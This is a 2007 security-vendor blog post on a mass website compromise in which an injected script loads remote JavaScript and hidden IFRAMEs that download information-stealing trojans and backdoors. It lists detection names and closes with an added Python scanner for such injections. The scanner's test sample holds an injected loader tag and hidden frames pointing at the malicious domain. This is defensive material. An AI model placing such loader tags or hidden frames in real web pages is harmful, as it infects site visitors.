November 8, 2007
by Macky Cruz (Technical Communications)

SANS reports that on November 6, hundreds of Web sites across the Internet were believed to have been compromised by an as-yet-unknown hacker. Details about how and why the attack was perpetrated remain murky. What we know so far is that a script which loads http://{BLOCKED}8.net/0.js has been injected into the affected sites; that script leads to a page riddled with invisible IFRAMEs, and these IFRAMEs link to pages that automatically download several files.

Some of the files are already proactively detected by generic patterns. The following are specific detections:

  • BKDR_DELF.HBW
  • TROJ_DELF.LGX
  • TROJ_DELF.MUF
  • TROJ_DELF.NHA
  • TROJ_DLOADER.QRE
  • TROJ_DLOADER.RZI
  • TROJ_DLOADER.SRD
  • TROJ_DOWQUE.ID
  • TROJ_DROPPER.CYP
  • TROJ_DROPPER.CZZ
  • TROJ_GENETIK.KK
  • TROJ_RISK.GD
  • TSPY_LEGMIR.CQQ
  • TSPY_ONLINEG.JCG
  • TSPY_ONLINEG.JVR
  • TSPY_ONLINEG.JZH
  • TSPY_ONLINEG.KCU
  • TSPY_ONLINEG.KEQ
  • TSPY_ONLINEG.KER
  • TSPY_ONLINEG.KES
  • TSPY_ONLINEG.KEU
  • TSPY_ONLINEG.KFH
  • TSPY_ONLINEG.KFJ
  • TSPY_ONLINEG.KFX
  • TSPY_ONLINEG.KGA
  • TSPY_ONLINEG.KGB
  • TSPY_ONLINEG.KGE
  • TSPY_ONLINEG.KGT
  • TSPY_ONLINEG.KWB
  • TSPY_ONLINEG.LMB
  • TSPY_ONLINEG.LPE
  • TSPY_QQGAME.HG
  • TSPY_QQGAME.HQ
  • TSPY_QQPASS.DCI
  • TSPY_WOW.AJZ
  • TSPY_WOW.AKA
  • TSPY_WOW.AKO
  • WORM_QQPASS.DCH

A rundown of the forty-plus files gives us Trojans, spyware, backdoors, and a worm belonging to families including, but not limited to, ONLINEG, WOW, QQPASS, and QQGAME, which are known information stealers targeting gamers and QQ users. File sizes ranged from 2KB to 177KB, with the largest being backdoor programs. Backdoors open ports on an infected machine, allowing remote malicious users to control the system.

Users who visit any of the compromised sites run the risk of infection, so gateway admins had better block traffic coming from yl18.net. Trend Micro advises users to deploy technology such as its Total Web Threat Protection in order to remain as secure as possible. Trend Micro Web threat protection technology protects users throughout the network, at the gateway, and in the Internet cloud.
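As an added example (not code from the original post or from Trend Micro), the following scanner checks saved HTML for the two markers described above: a `<script src>` pointing at the host the post says to block, and IFRAMEs hidden via zero size or CSS. The sample page and the combined layout (loader and hidden frames on one page) are constructed for illustration; the post describes the frames as living on the page 0.js leads to.

```python
# Added example: flag injected loader scripts and hidden IFRAMEs in saved HTML.
# BLOCKED_HOSTS and SAMPLE are constructed for this illustration.
from html.parser import HTMLParser
from urllib.parse import urlparse
import re

BLOCKED_HOSTS = {"yl18.net"}  # host the post recommends blocking at the gateway

HIDDEN_STYLE = re.compile(r"display\s*:\s*none|visibility\s*:\s*hidden", re.I)


def host_of(url):
    """Return the lowercase host of a URL, or '' for relative paths."""
    return (urlparse(url).hostname or "").lower()


class InjectionScanner(HTMLParser):
    """Collects (kind, detail) findings while parsing the page."""

    def __init__(self):
        super().__init__()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "script" and "src" in a:
            h = host_of(a["src"])
            # Match the blocked host itself or any subdomain of it.
            if h in BLOCKED_HOSTS or any(h.endswith("." + b) for b in BLOCKED_HOSTS):
                self.findings.append(("blocked_script", a["src"]))
        elif tag == "iframe":
            zero = a.get("width", "").strip() == "0" or a.get("height", "").strip() == "0"
            if zero or HIDDEN_STYLE.search(a.get("style", "")):
                self.findings.append(("hidden_iframe", a.get("src", "")))


def scan_html(html):
    """Parse html and return the list of (kind, detail) findings."""
    s = InjectionScanner()
    s.feed(html)
    s.close()
    return s.findings


# Constructed sample: a benign store page with an injected loader and hidden frames.
SAMPLE = """<html><body><h1>Store</h1>
<script src="http://yl18.net/0.js"></script>
<iframe src="http://yl18.net/x.htm" width="0" height="0"></iframe>
<iframe src="http://yl18.net/y.htm" style="visibility:hidden"></iframe>
<iframe src="http://www.example.com/widget" width="300" height="200"></iframe>
<script src="/js/site.js"></script>
</body></html>"""

if __name__ == "__main__":
    for kind, detail in scan_html(SAMPLE):
        print(kind, detail)
```

The visible 300x200 frame and the site's own relative script are not reported, so the scanner can be run over a crawl of your own pages without flooding on legitimate embeds.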
